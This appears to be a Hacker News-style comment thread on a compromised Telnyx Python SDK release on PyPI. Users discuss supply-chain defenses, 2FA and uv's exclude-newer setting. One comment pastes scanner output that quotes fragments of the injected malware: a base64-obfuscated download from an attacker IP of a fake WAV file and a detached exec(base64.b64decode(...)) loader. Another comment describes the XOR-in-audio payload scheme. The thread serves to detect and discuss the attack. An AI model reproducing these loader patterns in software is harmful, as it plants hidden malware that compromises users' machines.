Telnyx package compromised on PyPI

ramimac

We haven't blogged this yet, but a variety of teams found this in parallel. The packages are quarantined by PyPi Follow the overall incident: https://ramimac.me/teampcp/#phase-10 Aikido/Charlie with a very quick blog: https://www.aikido.dev/blog/telnyx-pypi-compromised-teampcp-... ReversingLabs, JFrog also made parallel reports

TZubiri

Shoutouts to all the real engineers who use a generic http client to call APIs and weren't impacted by this.

carlsborg

Anthropic/OpenAI could own this space. They should offer a paid service that offers a mirror with LLM scanned and sandbox-evaluated package with their next gen models. Free for individuals, orgs can subscribe to it.

slowmovintarget

Telnyx provides voice capabilities for OpenClaw for those wondering.

f311a

They did not even try to hide the payload that much. Every basic checker used by many security companies screams at `exec(base64.b64decode` when grepping code using simple regexes. hexora audit 4.87.1/2026-03-27-telnyx-v4.87.1.zip --min-confidence high --exclude HX4000 warning[HX9000]: Potential data exfiltration with Decoded data via urllib.request.request.Request. ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:77 86:13 │ 7783 │ except: 7784 │ pass 7785 │ 7786 │ r = urllib.request.Request(_d('aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg=='), headers={_d('VXNlci1BZ2VudA=='): _d('TW96aWxsYS81LjA=')}) │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX9000 7787 │ with urllib.request.urlopen(r, timeout=15) as d: 7788 │ with open(t, "wb") as f: 7789 │ f.write(d.read()) │ = Confidence: High Help: Data exfiltration is the unauthorized transfer of data from a computer. warning[HX4010]: Execution of obfuscated code. ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:78 10:9 │ 7807 │ if os.name == 'nt': 7808 │ return 7809 │ try: 7810 │ ╭ subprocess.Popen( 7811 │ │ [sys.executable, "-c", f"import base64; exec(base64.b64decode('{_p}').decode())"], 7812 │ │ stdout=subprocess.DEVNULL, 7813 │ │ stderr=subprocess.DEVNULL, 7814 │ │ start_new_session=True 7815 │ │ ) │ ╰─────────^ HX4010 7816 │ except: 7817 │ pass 7818 │ │ = Confidence: VeryHigh Help: Obfuscated code exec can be used to bypass detection.

viscousviolin

Is there a notification channel you can subscribe to / look at if you want to stay up to date on compromised PyPI packages?

dlcarrier

At this point, I'm not updating anything using Python. Not that I had the option anyway, because everything using Python breaks if you update it. You know they've given up on backward comparability and version control, when the solution is: run everything in a VM, with its own installation. Apparently it's also needed for security, but the VMs aren't really set up to be secure. I don't get why everything math heavy uses it. I blame MATLAB for being so awful that it made Python look good. It's not even the language itself, not that it doesn't have its own issues, or the inefficient way it's executed, but the ecosystem around it is so made out of technical debt.

jbrowning

> The payload isn't delivered as a raw binary or a Python file. It's disguised as a .wav audio file. > The WAV file is a valid audio file. It passes MIME-type checks. But the audio frame data contains a base64-encoded payload. Decode the frames, take the first 8 bytes as the XOR key, XOR the rest, and you have your executable or Python script. Talk about burying the lede.

charcircuit

2FA needs to be required for publishing packages. An attacker compromising someone's CI should not give them free reign to publish malicious packages at any time they want.

oncallthrow

I think it's only a matter of time at this point before a devastating supply chain attack occurs. Supply-chain security is such a dumpster fire, and threat actors are realising that they can use LLMs to organize such attacks.

ilaksh

The way I use Telynx is via SIP which is an open protocol. No reason we should be relying on proprietary APIs for this stuff. On GitHub see my fork runvnc/PySIP. Please let me know if you know if something better for python that is not copy left or rely on some copy left or big external dependency. I was using baresip but it was a pain to integrate and configure with python. Anyway, after fixing a lot in the original PySIP my version works with Telynx. Not tested on other SIP providers.

rvz

That's not good. Time to raise the package security draw bridge on vibe coders.

ivanvanderbyl

Has anyone here used Telnyx? I tried to build a product against their API last year and 3 weeks after signing up they banned my account and made it impossible to get an answer as to why or re-enable it.

mil22

For those using uv , you can at least partially protect yourself against such attacks by adding this to your pyproject.toml : [tool.uv] exclude-newer = "7 days" or this to your ~/.config/uv/uv.toml : exclude-newer = "7 days" This will prevent uv picking up any package version released within the last 7 days, hopefully allowing enough time for the community to detect any malware and yank the package version before you install it.

jlundberg

We have always been API first rather than SDK first. Never really thought too much about the security implications but that is of course a benefit too. Main reasoning for us has been to aim for a really nice HTTP API rather than hide uglyness with an SDK on top.

LoganDark

I used to use Telnyx many years ago, but was squeezed out when they started adding layer after layer of mandatory identity verification. Nope.

indigodaddy

Hah, need to setup a Grandstream HT801 this weekend and this cements my decision to use voip.ms vs telnyx. Not that the device would use that library (have no idea), but just, yeah generally, it's a good cue to stay away for me.

infinitewars

Is this happening in part due to the sheer volume of pull-requests with AI generated code.. things are slipping through?

spocchio

Is there anyone who uses it? I see their repo's Initial Commit was on Jan 2026... quite a new package! Also, the number of GitHub stars and forks is quite low. Does the package have a user base, or did the malicious team target one of the many useless GitHub repos?

deathanatos

> The Telnyx platform, APIs, and infrastructure were not compromised. This incident was limited to the PyPI distribution channel for the Python SDK. Am I being too nitpicky to say that that is part of your infrastructure? Doesn't 2FA stop this attack in its tracks? PyPI supports 2FA, no?